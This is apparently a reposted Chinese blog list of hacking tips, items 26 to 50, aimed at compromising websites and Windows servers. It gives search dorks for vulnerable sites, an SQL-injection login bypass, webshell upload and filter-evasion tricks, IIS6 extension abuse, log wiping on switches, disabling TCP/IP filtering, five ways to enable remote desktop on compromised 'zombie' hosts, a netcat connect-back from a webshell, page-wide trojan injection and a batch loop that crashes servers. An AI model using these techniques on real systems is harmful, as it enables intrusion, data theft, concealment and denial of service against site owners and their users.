26. 将 工具传到 邮箱 在下载上右击 复制快捷方式 拥有自己了的 下载空间

　　27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去 [url]http://cnc.[/url] QQ.com/bbn/冲

　　28. 搜索 企业网络办公 系统 添’or’’=’ 登陆 在个人 邮箱 上传asp ***

　　29.本人原创  搜索"一点点星空驿站 留言本" 默认 数据库是gbmdb.mdb 很多 网站用这个留言本 但是用 搜索引擎搜不到 可以给大家在入寝时多个思路

　　30.在程序上传shell过程中，程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp ***,我们来把他的标签换一下： 保存为.asp,程序照样 执行.

　　31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马

　　32.喜欢网页挂马的看看这篇总结文章吧

　　 [url]http://77169.com/news/hk/2005060611656.html[/url]

　　33. 搜索"p_w_picpaths/admin" 或".tw/p_w_picpaths/admin" 可以找到些台湾的 数据库

　　34.iis6 for windows 2003 enterprise ed ITion 如iis发布目录文件夹包含.asp后辍名.

　　将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

　　.cer 等后缀的文件夹下都可以运行任何后缀的asp ***

　　35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip

　　然后用#clear logg和#clear line vty *删除日志

　　36. 搜索关键字:"copyright 2003-2004  动易 网络" 后面地址改成upfile_soft.asp 这样的 漏洞很多

　　37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的 漏洞 拿到管理员的前后台密码  工具：bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马

　　38.学会总结 ***思路 [url]http://www.77169.com/news/hk/2005060811688.html[/url]

　　39. 电脑坏了省去重新安装 系统的方法

　　纯dos下执行，

　　xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config

　　2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config

　　40.一般人设置啊拉 QQ大盗的时候发信和收信都是同一个信箱，因此当我的机子中了此 ***后没有立即杀掉进程，而是用内存编辑 工具打开它的进程，查找smtp字样，就会找到它的信箱和密码了。只对1.5以前的管用. 　41.内网控制内网 用vidc 还要有一只肉鸡  动画看黑基的

　　 [url]http://soft.77169.com/62/20050608/6878.html[/url]

　　42.有许多管理员用备份的日期做备份 数据库的名字

　　比如 [url]http://www.hack6.com/bbs/databackup/20050601.mdb[/url]

　　43.动网 数据库oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&subm IT=%b8%fc+%d0%c2

　　不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面

　　 [url]http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10[/url],11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2

　　%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是“填写登录信息”

　　那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名

　　44.对付信息监控 系统  ***必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到 服务器加用户
45.解决tcp/ip筛选 在注册表里有三处，分别是：

　　hkey_local_machine\system\controlset001\services\tcpip

　　hkey_local_machine\system\controlset002\services\tcpip

　　hkey_local_machine\system\currentcontrolset\services\tcpip

　　分别用

　　reged IT -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip

　　reged IT -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip

　　reged IT -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip

　　命令来导出注册表项

　　然后把三个文件里的enablesecur ITyfilters"=dword:00000001，

　　改成enablesecur ITyfilters"=dword:00000000 再将以上三个文件分别用

　　regedit -s d:\a.reg regedit -s d:\b.reg reged IT -s d:\c.reg 导入注册表即可

　　46.使chm***无法在本地运行 ***程序 将注册表"hkey_current_u

　　ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004项的值由原来十进制的0改为十六进制的3。

　　47.开3389的5种方法

　　(1)打开记事本，编辑内容如下：

　　echo [components] > c:\sql

　　echo tsenable = on >> c:\sql

　　sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

　　编辑好后存为bat文件，上传至肉鸡，执行。

　　(2) (对xp\2000都有效) 脚本文件 本地开3389  工具:rots1.05

　　 下载地址: [url]www.netsill.com/rots.zip[/url]

　　在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

　　c:\>cscript rots.vbs <目标ip> <用户名> <密码> [ 服务端口] [/r]

　　如果要对本地使用，ip地址为127.0.0.1或者一个点(用.表示)，用户名和密码都为空(用 ""表示)。

　　(3)djshao正式版5.0

　　解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下，然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡 会自动重启!重启后会出现终端 服务

　　(4) 下载dameware nt util ITies 3.66.0.0 注册版

　　地址 [url]www.netsill.com/dwmrcw36600.zip[/url]

　　安装注册完毕后输入对方ip用户名密码，等待出现是否安装的对话框点是。

　　复制启动后出现对方桌面。

　　在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入 后在启动终端 服务上打上勾。确定自动提示重起，重起后ok

　　(5)大家最常用的 3389.exe  下载地址 [url]www.hack6.com [/url]把程序上传到肉鸡运行后重启既可

　　48. QQ上得到别人的ip

　　一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大

　　当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复

　　还可以用天网防火墙选择上udp 数据保检测,即可拦截到对方ip

　　49.挂马js代码document.wr ITe(’’);保存到js页面里 可让所有页面挂马

　　50.让 服务器重启

　　写个bat死循环:

　　@echo off

　　:loop1

　　cls

　　start cmd.exe

　　goto loop1

　　保存成bat guset权限就可以运行 运行后很快 服务器就会死机 管理员自然会去重启
本文出自 51CTO.COM技术博客